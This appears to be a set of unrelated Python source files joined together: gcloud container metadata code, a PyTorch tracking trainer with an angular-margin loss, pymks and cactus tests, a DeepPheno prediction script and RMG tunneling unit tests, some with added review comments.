  docker_metadata = {
      USER_DATA_KEY: _GetUserInit(run_as_privileged),
      CONTAINER_MANIFEST_KEY: _GetContainerManifest(
          name=name,
          container_manifest=container_manifest,
          docker_image=docker_image,
          port_mappings=port_mappings,
          run_command=run_command,
          run_as_privileged=run_as_privileged),
  }
  return metadata_utils.ConstructMetadataMessage(
      messages,
      metadata=docker_metadata,
      existing_metadata=user_metadata)
def ExpandGciImageFlag():
  """Select a GCI image to run Docker.

  Returns:
    Full resource path of a pinned GCI stable image.
  """
  # TODO(user, b/29154416): get latest image in GCI major release
  # Pin this version of gcloud to GCI image version
  return 'projects/google-containers/global/images/gci-stable-50-7978-71-0'
def _ValidateAndParsePortMapping(port_mappings):
  """Parses and validates port mapping.

  Each mapping must look like PORT:TARGET_PORT:PROTOCOL; the result is a
  list of Kubernetes container-port dicts.
  """
  pattern = re.compile(r'^(\d+):(\d+):(\S+)$')
  parsed = []
  for mapping in port_mappings:
    match = pattern.match(mapping)
    if not match:
      raise exceptions.InvalidArgumentException(
          '--port-mappings',
          'Port mappings should follow PORT:TARGET_PORT:PROTOCOL format.')
    port, target_port, protocol = match.groups()
    if protocol not in ALLOWED_PROTOCOLS:
      raise exceptions.InvalidArgumentException(
          '--port-mappings',
          'Protocol should be one of [{0}]'.format(
              ', '.join(ALLOWED_PROTOCOLS)))
    parsed.append({
        'containerPort': int(target_port),
        'hostPort': int(port),
        'protocol': protocol})
  return parsed
|
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import math
import torch
import numpy as np
import torch.nn as nn
import torch.nn.functional as F
from torch.autograd import Variable
from torch.nn import Parameter
import torchvision
from models.losses import FocalLoss, TripletLoss
from models.losses import RegL1Loss, RegLoss, NormRegL1Loss, RegWeightedL1Loss
from models.decode import mot_decode
from models.utils import _sigmoid, _tranpose_and_gather_feat
from utils.post_process import ctdet_post_process
from .base_trainer import BaseTrainer
def myphi(x, m):
    """Polynomial approximation of phi(m*x) used when phiflag is False.

    NOTE(review): the final x**9/9! term departs from the cosine Taylor
    series (which would be +x**10/10!); kept byte-compatible with the
    original implementation — confirm before "fixing".
    """
    x = x * m
    fact = math.factorial
    return (1 - x**2 / fact(2) + x**4 / fact(4) - x**6 / fact(6)
            + x**8 / fact(8) - x**9 / fact(9))
class AngleLinear(nn.Module):
    """Angular-margin linear layer: produces (cos_theta, phi_theta) pairs
    from input features and a column-normalized weight matrix.

    NOTE(review): structure is consistent with the A-Softmax / SphereFace
    margin layer — confirm against the originating paper before citing.
    """
    def __init__(self, in_features, out_features, m = 4, phiflag=True):
        # :param in_features: feature length F
        # :param out_features: number of classes
        # :param m: angular-margin multiplier (selects mlambda[m])
        # :param phiflag: use the closed-form cos(m*theta) polynomials when
        #     True, the myphi() approximation otherwise
        super(AngleLinear, self).__init__()
        self.in_features = in_features
        self.out_features = out_features
        self.weight = Parameter(torch.Tensor(in_features,out_features))
        # init uniform in [-1, 1], then normalize columns to (near) unit norm
        self.weight.data.uniform_(-1, 1).renorm_(2,1,1e-5).mul_(1e5)
        self.phiflag = phiflag
        self.m = m
        # Chebyshev polynomials of the first kind: mlambda[k](cos t) == cos(k*t)
        self.mlambda = [
            lambda x: x**0,
            lambda x: x**1,
            lambda x: 2*x**2-1,
            lambda x: 4*x**3-3*x,
            lambda x: 8*x**4-8*x**2+1,
            lambda x: 16*x**5-20*x**3+5*x
        ]
    def forward(self, input):
        x = input # size=(B,F) F is feature len
        w = self.weight # size=(F,Classnum) F=in_features Classnum=out_features
        # column-normalize the weights (renorm to 1e-5 then rescale by 1e5)
        ww = w.renorm(2,1,1e-5).mul(1e5)
        xlen = x.pow(2).sum(1).pow(0.5) # size=B
        wlen = ww.pow(2).sum(0).pow(0.5) # size=Classnum
        # cosine similarity between every feature row and every class column
        cos_theta = x.mm(ww) # size=(B,Classnum)
        cos_theta = cos_theta / xlen.view(-1,1) / wlen.view(1,-1)
        cos_theta = cos_theta.clamp(-1,1)
        if self.phiflag:
            # closed form: cos(m*theta) via Chebyshev polynomial
            cos_m_theta = self.mlambda[self.m](cos_theta)
            theta = Variable(cos_theta.data.acos())
            # k counts which monotone branch of cos(m*theta) we are on
            k = (self.m*theta/3.14159265).floor()
            n_one = k*0.0 - 1
            # monotone decreasing extension: (-1)^k * cos(m*theta) - 2k
            phi_theta = (n_one**k) * cos_m_theta - 2*k
        else:
            # polynomial approximation path
            theta = cos_theta.acos()
            phi_theta = myphi(theta,self.m)
            phi_theta = phi_theta.clamp(-1*self.m,1)
        # rescale both outputs by the input feature norms
        cos_theta = cos_theta * xlen.view(-1,1)
        phi_theta = phi_theta * xlen.view(-1,1)
        output = (cos_theta,phi_theta)
        return output # size=(B,Classnum,2)
class AngleLoss(nn.Module):
    """Focal-weighted angular-margin loss.

    Consumes the (cos_theta, phi_theta) pair produced by AngleLinear and,
    on the target entries only, anneals from plain cos_theta toward the
    margin-augmented phi_theta as `lamb` decays with the iteration count.
    """
    def __init__(self, gamma=0):
        super(AngleLoss, self).__init__()
        self.gamma = gamma        # focal-loss focusing exponent
        self.it = 0               # iteration counter driving the annealing
        self.LambdaMin = 5.0      # floor of the annealing schedule
        self.LambdaMax = 1500.0   # starting value of the schedule
        self.lamb = 1500.0
    def forward(self, input, target):
        """
        :param input: tuple (cos_theta, phi_theta), each of size (B, Classnum)
        :param target: class indices, size (B,) or (B, 1)
        :return: scalar mean loss
        """
        self.it += 1
        cos_theta, phi_theta = input
        target = target.view(-1, 1)  # size=(B,1)
        # boolean one-hot mask selecting each row's target entry
        index = cos_theta.data * 0.0  # size=(B,Classnum)
        idx = index.scatter(1, target.data.view(-1, 1), 1)
        idx = idx.bool()
        idx = Variable(idx)
        # annealing: lamb decays from LambdaMax toward LambdaMin
        self.lamb = max(self.LambdaMin, self.LambdaMax / (1 + 0.1 * self.it))
        output = cos_theta * 1.0  # size=(B,Classnum)
        # blend phi_theta into the target logits with weight 1/(1+lamb)
        output[idx] = cos_theta[idx] - cos_theta[idx] * (1.0 + 0) / (1 + self.lamb) + phi_theta[idx] * (1.0 + 0) / (1 + self.lamb)
        # BUG FIX: log_softmax previously relied on the deprecated implicit
        # dim; the class dimension is now explicit (same result for 2-D input)
        logpt = F.log_softmax(output, dim=1)
        logpt = logpt.gather(1, target)
        logpt = logpt.view(-1)
        pt = Variable(logpt.data.exp())
        # focal modulation; reduces to plain NLL when gamma == 0
        loss = -1 * (1 - pt) ** self.gamma * logpt
        loss = loss.mean()
        return loss
class MotLoss(torch.nn.Module):
    """Multi-task loss combining detection (heatmap, box size, offset) with
    re-identification, balanced by learnable uncertainty weights s_det/s_id.
    """

    def __init__(self, opt):
        super(MotLoss, self).__init__()
        self.opt = opt

        # Heatmap criterion: MSE or focal loss depending on options.
        if opt.mse_loss:
            self.crit = torch.nn.MSELoss()
        else:
            self.crit = FocalLoss()

        # Box-regression criterion.
        if opt.reg_loss == 'l1':
            self.crit_reg = RegL1Loss()
        elif opt.reg_loss == 'sl1':
            self.crit_reg = RegLoss()
        else:
            self.crit_reg = None

        # Width/height criterion (falls back to the regression criterion).
        if opt.dense_wh:
            self.crit_wh = torch.nn.L1Loss(reduction='sum')
        elif opt.norm_wh:
            self.crit_wh = NormRegL1Loss()
        elif opt.cat_spec_wh:
            self.crit_wh = RegWeightedL1Loss()
        else:
            self.crit_wh = self.crit_reg

        # Identity-embedding classifier head.
        self.emb_dim = opt.reid_dim
        self.nID = opt.nID
        self.classifier = nn.Linear(self.emb_dim, self.nID)
        self.IDLoss = nn.CrossEntropyLoss(ignore_index=-1)
        self.emb_scale = math.sqrt(2) * math.log(self.nID - 1)

        # Learnable log-variance weights for the two task groups.
        self.s_det = nn.Parameter(-1.85 * torch.ones(1))
        self.s_id = nn.Parameter(-1.05 * torch.ones(1))

    def forward(self, outputs, batch):
        """Accumulate per-stack losses and combine them with uncertainty weights.

        Returns:
            (loss, loss_stats) where loss_stats maps each component name to
            its (unweighted) value.
        """
        opt = self.opt
        hm_loss, wh_loss, off_loss, id_loss = 0, 0, 0, 0
        n_stacks = opt.num_stacks

        for stack_idx in range(n_stacks):
            head = outputs[stack_idx]
            if not opt.mse_loss:
                head['hm'] = _sigmoid(head['hm'])
            hm_loss += self.crit(head['hm'], batch['hm']) / n_stacks

            # NOTE(review): wh uses crit_reg here (not crit_wh) — confirm intended.
            if opt.wh_weight > 0:
                wh_loss += self.crit_reg(
                    head['wh'], batch['reg_mask'],
                    batch['ind'], batch['wh']) / n_stacks

            if opt.reg_offset and opt.off_weight > 0:
                off_loss += self.crit_reg(
                    head['reg'], batch['reg_mask'],
                    batch['ind'], batch['reg']) / n_stacks

            if opt.id_weight > 0:
                # Keep only embeddings at positions with a ground-truth object.
                keep = batch['reg_mask'] > 0
                id_head = head['id_feature'][keep].contiguous()
                id_head = self.emb_scale * F.normalize(id_head)
                id_target = batch['ids'][keep]
                id_output = self.classifier(id_head).contiguous()
                id_loss += self.IDLoss(id_output, id_target)

        det_loss = (opt.hm_weight * hm_loss
                    + opt.wh_weight * wh_loss
                    + opt.off_weight * off_loss)
        # Kendall-style uncertainty weighting between detection and ID tasks.
        loss = 0.5 * (torch.exp(-self.s_det) * det_loss
                      + torch.exp(-self.s_id) * id_loss
                      + (self.s_det + self.s_id))
        loss_stats = {'loss': loss, 'hm_loss': hm_loss,
                      'wh_loss': wh_loss, 'off_loss': off_loss, 'id_loss': id_loss}
        return loss, loss_stats
class MotTrainer(BaseTrainer):
    """Trainer that wires MotLoss into the generic BaseTrainer loop."""

    def __init__(self, opt, model, optimizer=None):
        super(MotTrainer, self).__init__(opt, model, optimizer=optimizer)

    def _get_losses(self, opt):
        """Return the loss-stat names and the loss module for this task."""
        stat_names = ['loss', 'hm_loss', 'wh_loss', 'off_loss', 'id_loss']
        return stat_names, MotLoss(opt)

    def save_result(self, output, batch, results):
        """Decode one batch's detections and store them under the image id."""
        offset = output['reg'] if self.opt.reg_offset else None
        decoded = mot_decode(
            output['hm'], output['wh'], reg=offset,
            cat_spec_wh=self.opt.cat_spec_wh, K=self.opt.K)
        decoded = decoded.detach().cpu().numpy().reshape(1, -1, decoded.shape[2])
        processed = ctdet_post_process(
            decoded.copy(), batch['meta']['c'].cpu().numpy(),
            batch['meta']['s'].cpu().numpy(),
            output['hm'].shape[2], output['hm'].shape[3], output['hm'].shape[1])
        img_id = batch['meta']['img_id'].cpu().numpy()[0]
        results[img_id] = processed[0]
|
<reponame>materialsinnovation/pymks
"""
The correlation module test cases
"""
import numpy as np
import dask.array as da
from pymks.fmks.correlations import two_point_stats
from pymks.fmks.correlations import correlations_multiple
# pylint: disable=too-many-arguments
def run_one(size, size_predict, chunk, chunks_predict, periodic_boundary, cutoff):
    """Check two_point_stats output shape and chunking for one configuration.

    Builds a random binary microstructure of shape ``size``, chunks it along
    the sample axis by ``chunk``, runs the autocorrelation, and asserts the
    computed shape equals ``size_predict`` and the dask chunks equal
    ``chunks_predict``.
    """
    raw = np.random.randint(2, size=size)
    chunk_shape = (chunk,) + raw.shape[1:]
    data = da.from_array(raw, chunks=chunk_shape)
    stats = two_point_stats(
        data, data, periodic_boundary=periodic_boundary, cutoff=cutoff
    )
    assert stats.compute().shape == size_predict
    assert stats.chunks == chunks_predict
def test_twodim_odd():
    """Two-point stats on a 2D microstructure with odd height and width."""
    cases = [
        ((2, 15, 15), (2, 9, 9), 1, ((1, 1), (9,), (9,)), False, 4),
        ((2, 15, 15), (2, 5, 5), 1, ((1, 1), (5,), (5,)), True, 2),
    ]
    for args in cases:
        run_one(*args)
def test_twodim_even():
    """Two-point stats on a 2D microstructure with even height and width."""
    cases = [
        ((3, 10, 10), (3, 9, 9), 2, ((2, 1), (9,), (9,)), False, 4),
        ((3, 10, 10), (3, 5, 5), 2, ((2, 1), (5,), (5,)), True, 2),
    ]
    for args in cases:
        run_one(*args)
def test_twodim_mix1():
    """Two-point stats on a 2D microstructure with odd height, even width."""
    cases = [
        ((1, 15, 10), (1, 9, 9), 1, ((1,), (9,), (9,)), False, 4),
        ((1, 15, 10), (1, 5, 5), 1, ((1,), (5,), (5,)), True, 2),
    ]
    for args in cases:
        run_one(*args)
def test_twodim_mix2():
    """Two-point stats on a 2D microstructure with even height, odd width."""
    cases = [
        ((1, 10, 15), (1, 9, 9), 1, ((1,), (9,), (9,)), False, 4),
        ((1, 10, 15), (1, 5, 5), 1, ((1,), (5,), (5,)), True, 2),
    ]
    for args in cases:
        run_one(*args)
def test_threedim():
    """Two-point stats on a 3D microstructure."""
    cases = [
        ((4, 10, 10, 15), (4, 9, 9, 9), 2, ((2, 2), (9,), (9,), (9,)), False, 4),
        ((4, 10, 10, 15), (4, 5, 5, 5), 2, ((2, 2), (5,), (5,), (5,)), True, 2),
    ]
    for args in cases:
        run_one(*args)
def test_onedim():
    """Two-point stats on a 1D microstructure."""
    cases = [
        ((4, 10), (4, 9), 2, ((2, 2), (9,)), False, 4),
        ((4, 10), (4, 5), 2, ((2, 2), (5,)), True, 2),
    ]
    for args in cases:
        run_one(*args)
def test_correlations_multiple():
    """Test that correlations_multiple chunks correctly.

    Regression test: the output chunks used to come out as
    ((1, 1), (3,), (3,), (1, 1)) for this example.
    """
    sample = da.random.randint(2, size=(2, 4, 4, 2), chunks=(1, 4, 4, 2))
    result = correlations_multiple(sample, [[0, 0], [0, 1]])
    assert result.chunks == ((1, 1), (5,), (5,), (2,))
def test_small_correlatoions_multiple():
    """Regression cases for small inputs, see
    https://github.com/materialsinnovation/pymks/issues/562
    """
    cases = [
        ([[[1, 0], [0, 1]]], [[0, 0]], [[[0], [1 / 2], [0]]]),
        ([[[0, 1], [0, 1], [1, 0]]], [[0, 0]], [[[0], [1 / 3], [0]]]),
        ([[[0, 1], [0, 1]]], [[1, 1]], [[[1], [1], [1]]]),
        ([[[0, 1], [0, 1], [1, 0], [1, 0]]], [[1, 1]],
         [[[0], [1 / 4], [1 / 2], [1 / 4], [0]]]),
    ]
    for raw, corr, expected in cases:
        assert np.allclose(correlations_multiple(np.array(raw), corr), expected)
|
#!/usr/bin/env python
import click as ck
import numpy as np
import pandas as pd
import tensorflow as tf
import tensorflow_addons as tfa
import logging
import math
import time
import sys
import os
from collections import deque
from tensorflow.keras.models import Model, load_model
from tensorflow.keras.layers import Layer
from tensorflow.keras import backend as K
from tensorflow.keras.utils import Sequence
from sklearn.metrics import roc_curve, auc, matthews_corrcoef
from deeppheno.aminoacids import MAXLEN, to_onehot
from deeppheno.utils import Ontology, FUNC_DICT, is_exp_code
from kerastuner.tuners import RandomSearch
from kerastuner import HyperModel
logging.basicConfig(level=logging.DEBUG)
class HPOLayer(Layer):
    """Keras layer that masks predictions with a fixed HPO relationship matrix.

    ``call`` repeats the (batch, nb_classes) input nb_classes times and
    multiplies it elementwise by a fixed (nb_classes, nb_classes) kernel, so
    output row ``j`` holds the input scores masked by row ``j`` of the matrix.
    The kernel is non-trainable.
    """
    def __init__(self, nb_classes, **kwargs):
        self.nb_classes = nb_classes
        # Placeholder; the real matrix is injected via set_hpo_matrix()
        # before build() runs.
        self.hpo_matrix = np.zeros((nb_classes, nb_classes), dtype=np.float32)
        super(HPOLayer, self).__init__(**kwargs)
    def set_hpo_matrix(self, hpo_matrix):
        # Must be called before build(); build() copies it into the kernel.
        self.hpo_matrix = hpo_matrix
    def get_config(self):
        # Serialize nb_classes so load_model() can reconstruct the layer.
        # NOTE(review): hpo_matrix itself is not part of the config — confirm
        # that restoring from saved weights is sufficient.
        config = super(HPOLayer, self).get_config()
        config['nb_classes'] = self.nb_classes
        return config
    def build(self, input_shape):
        # Fixed kernel holding the HPO matrix; registered as non-trainable.
        self.kernel = K.variable(
            self.hpo_matrix, name='{}_kernel'.format(self.name))
        self.non_trainable_weights.append(self.kernel)
        super(HPOLayer, self).build(input_shape)  # Be sure to call this at the end
    def call(self, x):
        # (batch, n) -> (batch, n, n): repeat rows, then mask with the kernel.
        x = tf.keras.backend.repeat(x, self.nb_classes)
        return tf.math.multiply(x, self.kernel)
    def compute_output_shape(self, input_shape):
        return [input_shape[0], self.nb_classes, self.nb_classes]
@ck.command()
@ck.option('--data-root', '-dr', default='data/', help='Data root folder', required=True)
@ck.option(
    '--in-file', '-if', required=True,
    help='Input file. TSV file with a list of genes with GO annotations (semicolon-space separated)')
@ck.option(
    '--hp-file', '-hf', default='hp.obo',
    help='Human Phenotype Ontology file in OBO Format')
@ck.option(
    '--go-file', '-gof', default='go.obo',
    help='Gene Ontology file in OBO Format')
@ck.option(
    '--terms-file', '-tf', default='terms.pkl',
    help='Data file with sequences and complete set of annotations')
@ck.option(
    '--gos-file', '-gf', default='gos.pkl',
    help='DataFrame with list of GO classes (as features)')
@ck.option(
    '--exp-file', '-ef', default='E-MTAB-5214-query-results.tpms.tsv',
    help='Gene expression data (Expression Atlas TPMs TSV)')
@ck.option(
    '--model-file', '-mf', default='model.h5',
    help='DeepPheno model')
@ck.option(
    '--out-file', '-o', default='predictions.tsv',
    help='Result file with predictions')
@ck.option(
    '--batch-size', '-bs', default=32,
    help='Batch size')
@ck.option(
    '--threshold', '-th', default=0.5,
    help='Prediction threshold')
def main(data_root, in_file, hp_file, go_file, terms_file, gos_file, exp_file,
         model_file, out_file, batch_size, threshold):
    """Predict HPO phenotype annotations for the genes listed in *in_file*.

    Loads the pretrained DeepPheno model and its term/GO feature tables from
    *data_root*, builds the feature matrix for every input gene, and writes
    one line per gene to *out_file*:
    ``gene<TAB>HP:xxx|score<TAB>...`` (only scores >= 0.1 are reported).
    """
    # Check data folder and required files
    try:
        if os.path.exists(data_root):
            hp_file = os.path.join(data_root, hp_file)
            go_file = os.path.join(data_root, go_file)
            model_file = os.path.join(data_root, model_file)
            terms_file = os.path.join(data_root, terms_file)
            gos_file = os.path.join(data_root, gos_file)
            exp_file = os.path.join(data_root, exp_file)
            if not os.path.exists(go_file):
                raise Exception(f'Gene Ontology file ({go_file}) is missing!')
            if not os.path.exists(hp_file):
                raise Exception(f'Human Phenotype Ontology file ({hp_file}) is missing!')
            if not os.path.exists(model_file):
                raise Exception(f'Model file ({model_file}) is missing!')
            if not os.path.exists(terms_file):
                raise Exception(f'Terms file ({terms_file}) is missing!')
            if not os.path.exists(gos_file):
                raise Exception(f'GOs file ({gos_file}) is missing!')
            if not os.path.exists(exp_file):
                raise Exception(f'Expressions file ({exp_file}) is missing!')
        else:
            raise Exception(f'Data folder {data_root} does not exist!')
    except Exception as e:
        logging.error(e)
        sys.exit(1)

    # GO classes used as input features.
    gos_df = pd.read_pickle(gos_file)
    gos = gos_df['gos'].values.flatten()
    gos_dict = {v: i for i, v in enumerate(gos)}

    # Module-level globals; other helpers in this module read these.
    global hpo
    hpo = Ontology(hp_file, with_rels=True)
    terms_df = pd.read_pickle(terms_file)
    global terms
    terms = terms_df['terms'].values.flatten()
    global term_set
    term_set = set(terms)

    df = load_data(in_file, exp_file)
    terms_dict = {v: i for i, v in enumerate(terms)}

    # Build the full feature matrix in a single batch (labels are unused).
    generator = DFGenerator(df, gos_dict, terms_dict, len(df))
    x, _ = generator[0]

    print('Loading pretrained model')
    model = load_model(model_file, custom_objects={'HPOLayer': HPOLayer})
    model.summary()
    preds = model.predict(x)

    # NOTE(review): the --threshold and --batch-size options are accepted but
    # the report cutoff below is hard-coded to 0.1 and prediction runs in one
    # batch — confirm whether the options should be honored.
    with open(out_file, 'w') as f:
        for i, row in enumerate(df.itertuples()):
            f.write(row.genes)
            for j in range(len(terms)):
                if preds[i, j] < 0.1:
                    continue
                f.write(f'\t{terms[j]}|{preds[i, j]:.3f}')
            f.write('\n')
def load_data(in_file, exp_file):
    """Load gene annotations and max-normalized tissue expression profiles.

    Args:
        in_file: TSV with the gene name in column 0 and '; '-separated GO
            annotations in column 1.
        exp_file: Expression TSV; column 1 holds the gene name (first word),
            columns 2+ hold up to 53 tissue expression values. Lines starting
            with '#' or 'Gene' are headers and are skipped.

    Returns:
        pandas.DataFrame with columns 'genes', 'annotations' (list of GO ids)
        and 'expressions' (float32 array of length 53; all-zero when the gene
        has no expression data).
    """
    gene_exp = {}
    with open(exp_file) as f:
        for line in f:
            if line.startswith('#') or line.startswith('Gene'):
                continue
            it = line.strip().split('\t')
            gene_name = it[1].split()[0].upper()
            exp = np.zeros((53,), dtype=np.float32)
            for i, value in enumerate(it[2:]):
                exp[i] = float(value) if value != '' else 0.0
            # Max-normalize; guard against all-zero profiles, which would
            # otherwise produce NaNs from a 0/0 division.
            max_val = np.max(exp)
            gene_exp[gene_name] = exp / max_val if max_val > 0 else exp
    annotations = []
    expressions = []
    genes = []
    with open(in_file) as f:
        for line in f:
            it = line.strip().split('\t')
            gene_name = it[0].upper()
            annots = it[1].split('; ')
            # Genes without expression data get an all-zero profile.
            exp = np.zeros((53,), dtype=np.float32)
            if gene_name in gene_exp:
                exp = gene_exp[gene_name]
            genes.append(it[0])
            annotations.append(annots)
            expressions.append(exp)
    df = pd.DataFrame(
        {'genes': genes, 'annotations': annotations,
         'expressions': expressions})
    return df
class DFGenerator(Sequence):
    """Keras Sequence yielding (GO one-hot + expression) batches from a DataFrame.

    Labels are returned all-zero: nothing in this generator fills them (it is
    used for prediction).
    """

    def __init__(self, df, gos_dict, terms_dict, batch_size):
        self.start = 0
        self.size = len(df)
        self.df = df
        self.batch_size = batch_size
        self.terms_dict = terms_dict
        self.gos_dict = gos_dict

    def __len__(self):
        # Number of batches needed to cover the whole DataFrame.
        return np.ceil(len(self.df) / float(self.batch_size)).astype(np.int32)

    def __getitem__(self, idx):
        lo = idx * self.batch_size
        hi = min(self.size, lo + self.batch_size)
        batch = self.df.iloc[np.arange(lo, hi)]
        n = len(batch)
        go_features = np.zeros((n, len(self.gos_dict)), dtype=np.float32)
        exp_features = np.zeros((n, 53), dtype=np.float32)
        labels = np.zeros((n, len(self.terms_dict)), dtype=np.int32)
        for row_idx, row in enumerate(batch.itertuples()):
            exp_features[row_idx, :] = row.expressions
            # Mark each annotated GO class that is part of the feature set.
            for go_id in row.annotations:
                if go_id in self.gos_dict:
                    go_features[row_idx, self.gos_dict[go_id]] = 1
        return ([go_features, exp_features], labels)
# Script entry point: run the click CLI.
if __name__ == '__main__':
    main()
|
#coding:utf-8
import os
import shutil
import tempfile
import unittest2 as unittest
from cactus.config.file import ConfigFile
from cactus.config.router import ConfigRouter
class TestConfigRouter(unittest.TestCase):
    """
    Test that the config router manages multiple files correctly.

    Every test runs against two JSON config files created in a fresh
    temporary directory; conf1 starts as {"a": 1} and conf2 as {"b": 2}.
    """
    def setUp(self):
        # Fresh temp directory per test so state never leaks between cases.
        self.test_dir = tempfile.mkdtemp()
        self.path = os.path.join(self.test_dir, "test")
        os.mkdir(self.path)
        self.path1 = os.path.join(self.path, "conf1.json")
        self.path2 = os.path.join(self.path, "conf2.json")
        self.conf1 = ConfigFile(self.path1)
        self.conf2 = ConfigFile(self.path2)
        self.conf1.set("a", 1)
        self.conf1.write()
        self.conf2.set("b", 2)
        self.conf2.write()
    def tearDown(self):
        shutil.rmtree(self.test_dir)
    def test_read(self):
        """
        Check that the config router reads correctly from the filesystem
        """
        router = ConfigRouter([self.path1, self.path2])
        self.assertEqual(router.get("a"), 1)
        self.assertEqual(router.get("b"), 2)
        # Unknown keys fall through to None.
        self.assertEqual(router.get("c"), None)
    def test_read_write(self):
        """
        Check that our config is readable after writing it
        """
        router = ConfigRouter([self.path1, self.path2])
        router.set("a", 3)
        router.set("b", 4)
        self.assertEqual(3, router.get("a"))
        self.assertEqual(4, router.get("b"))
    def test_write(self):
        """
        Check that the config router writes correctly to the filesystem
        """
        router = ConfigRouter([self.path1, self.path2])
        router.set("a", 3)
        router.set("b", 4)
        router.write()
        # Reload both files from disk and check each key landed in the file
        # that already owned it.
        self.conf1.load()
        self.conf2.load()
        self.assertEqual(self.conf1.get("a"), 3)
        self.assertEqual(self.conf1.get("b"), None)
        self.assertEqual(self.conf2.get("b"), 4)
        self.assertEqual(self.conf2.get("a"), None)
    def test_collision(self):
        """
        Check that we get the right key when there is a collision
        """
        # Give both files both keys; the first file in the router wins.
        self.conf1.set("b", 3)
        self.conf2.set("a", 4)
        self.conf1.write()
        self.conf2.write()
        router = ConfigRouter([self.path1, self.path2])
        self.assertEqual(router.get("a"), 1)
        self.assertEqual(router.get("b"), 3)
    def test_duplicate(self):
        """
        Check that the config router handles duplicate files properly.
        """
        router = ConfigRouter([self.path1, self.path1])
        router.set("a", 3)
        router.write()
        self.conf1.load()
        self.assertEqual(self.conf1.get("a"), 3)
    def test_nested(self):
        """
        Test that we support nested config for context
        """
        self.conf1.set("context", {"k1":"v1"})
        self.conf2.set("context", {"k2":"v2"})
        self.conf1.write()
        self.conf2.write()
        router = ConfigRouter([self.path1, self.path2])
        # nested=True merges the dict values across files.
        context = router.get("context", default={}, nested=True)
        self.assertEqual(context.get("k1"), "v1")
        self.assertEqual(context.get("k2"), "v2")
    def test_dirty(self):
        """
        Test that we don't re-write files that we haven't changed
        """
        self.conf1.set("a", "b")
        self.conf1.write()
        # Clobber the file behind the config's back; an unchanged config
        # must not overwrite it on the second write().
        with open(self.path1, "w") as f:
            f.write("canary")
        self.conf1.write()
        with open(self.path1) as f:
            self.assertEqual("canary", f.read())
    def test_missing_file(self):
        """
        Test that we don't throw on a missing file, and that the configuration
        remains in a consistent state.
        """
        wrong_path = os.path.join(self.path, "does_not_exist.json")
        self.conf1.set("context", {"k1":"v1"})
        self.conf1.write()
        router = ConfigRouter([wrong_path, self.path1])
        self.assertEqual(router.get("context").get("k1"), "v1")
    def test_broken_file(self):
        """
        Test that we don't throw on a broken file, and that the configuration
        remains in a consistent state.
        """
        # Invalid JSON in the first file must not break lookups in the second.
        with open(self.path1, "w") as f:
            f.write("{broken}")
        self.conf2.set("context", {"k1":"v1"})
        self.conf2.write()
        router = ConfigRouter([self.path1, self.path2])
        self.assertEqual(router.get("context").get("k1"), "v1")
|
#!/usr/bin/env python
# encoding: utf-8
################################################################################
#
# RMG - Reaction Mechanism Generator
#
# Copyright (c) 2002-2009 Prof. <NAME> (<EMAIL>) and the
# RMG Team (<EMAIL>)
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the "Software"),
# to deal in the Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish, distribute, sublicense,
# and/or sell copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL
# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
# DEALINGS IN THE SOFTWARE.
#
################################################################################
"""
This script contains unit tests of the :mod:`rmgpy.kinetics.tunneling` module.
"""
import unittest
import numpy
from rmgpy.kinetics.tunneling import Wigner, Eckart
################################################################################
class TestWigner(unittest.TestCase):
    """
    Contains unit tests of the :class:`Wigner` class.

    NOTE(review): this file targets Python 2 (it imports ``cPickle``).
    """
    def setUp(self):
        """
        A function run before each unit test in this class.
        """
        # Imaginary transition-state frequency in cm^-1 (negative value).
        self.frequency = -2017.96
        self.tunneling = Wigner(
            frequency = (self.frequency,"cm^-1"),
        )
    def test_frequency(self):
        """
        Test that the Wigner frequency property was properly set.
        """
        self.assertAlmostEqual(self.tunneling.frequency.value_si, self.frequency, 4)
    def test_calculateTunnelingFactor(self):
        """
        Test the Wigner.calculateTunnelingFactor() method.
        """
        # Temperatures (K) and the expected tunneling correction factors.
        Tlist = numpy.array([300,500,1000,1500,2000])
        kexplist = numpy.array([4.90263, 2.40495, 1.35124, 1.15611, 1.08781])
        for T, kexp in zip(Tlist, kexplist):
            kact = self.tunneling.calculateTunnelingFactor(T)
            self.assertAlmostEqual(kexp, kact, 4)
    def test_pickle(self):
        """
        Test that a Wigner object can be successfully pickled and unpickled
        with no loss of information.
        """
        import cPickle
        tunneling = cPickle.loads(cPickle.dumps(self.tunneling))
        self.assertAlmostEqual(self.tunneling.frequency.value, tunneling.frequency.value, 2)
        self.assertEqual(self.tunneling.frequency.units, tunneling.frequency.units)
    def test_repr(self):
        """
        Test that a Wigner object can be successfully reconstructed from its
        repr() output with no loss of information.
        """
        # NOTE(review): rebinding a local via exec() only works on Python 2;
        # under Python 3 'tunneling' would remain None here.
        tunneling = None
        exec('tunneling = {0!r}'.format(self.tunneling))
        self.assertAlmostEqual(self.tunneling.frequency.value, tunneling.frequency.value, 2)
        self.assertEqual(self.tunneling.frequency.units, tunneling.frequency.units)
################################################################################
class TestEckart(unittest.TestCase):
    """
    Contains unit tests of the :class:`Eckart` class.

    NOTE(review): this file targets Python 2 (it imports ``cPickle``).
    """
    def setUp(self):
        """
        A function run before each unit test in this class.
        """
        # Imaginary TS frequency (cm^-1) and 0 K energies (kJ/mol) of
        # reactants, transition state, and products.
        self.frequency = -2017.96
        self.E0_reac = -295.563
        self.E0_TS = -12.7411
        self.E0_prod = (-10.2664) + (-253.48)
        self.tunneling = Eckart(
            frequency = (self.frequency,"cm^-1"),
            E0_reac = (self.E0_reac,"kJ/mol"),
            E0_TS = (self.E0_TS,"kJ/mol"),
            E0_prod = (self.E0_prod,"kJ/mol"),
        )
    def test_frequency(self):
        """
        Test that the Eckart frequency property was properly set.
        """
        self.assertAlmostEqual(self.tunneling.frequency.value_si, self.frequency, 4)
